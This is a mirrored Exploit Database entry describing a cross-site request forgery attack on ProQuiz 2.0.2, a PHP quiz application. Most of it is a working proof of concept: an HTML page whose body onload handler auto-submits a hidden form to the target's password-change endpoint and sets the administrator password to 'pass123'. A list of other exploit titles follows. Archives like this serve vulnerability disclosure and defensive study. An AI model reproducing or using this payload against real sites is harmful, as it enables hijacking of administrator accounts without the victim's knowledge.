ProQuiz 2.0.2 – Cross-Site Request Forgery

Exploit Database
11 阅读

作者： DaOne

日期： 2012-08-16
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/20550/

##########################################

[~] Exploit Title: ProQuiz v2.0.2 CSRF Vulnerability

[~] Author: DaOne

[~] Date: 19/8/2012

[~] Software Link: http://code.google.com/p/proquiz/downloads/list

##########################################



[#] [ CSRF Change Admin Password ]



</form>

<html>

<body onload="document.form0.submit();">

<form method="POST" name="form0" action="http://[target]/functions.php?action=edit_profile&type=password">

<input type="hidden" name="password" value="pass123"/>

<input type="hidden" name="cpassword" value="pass123"/>

</form>

</body>

</html>



##########################################

last Exploits
ProQuiz 2.0.2 – Cross-Site Request Forgery的更多信息

Flynax General Classifieds CMS 4.0 – Multiple Vulnerabilities：
Zenario CMS 8.8.52729 – ‘cID’ SQL injection (Authenticated)：
Jedox 2020.2.5 – Stored Cross-Site Scripting in Log-Module：
Horde Imp – ‘imap_open’ Remote Command Execution：
Piwigo Plugin User Tag 0.9.0 – Cross-Site Scripting：
MyBB ChangUonDyU Plugin 1.0.2 – Cross-Site Scripting：
Nanometrics Centaur 4.3.23 – Unauthenticated Remote Memory Leak：
Church Management System 1.0 – ‘Multiple’ Stored Cross-Site Scripting (XSS)：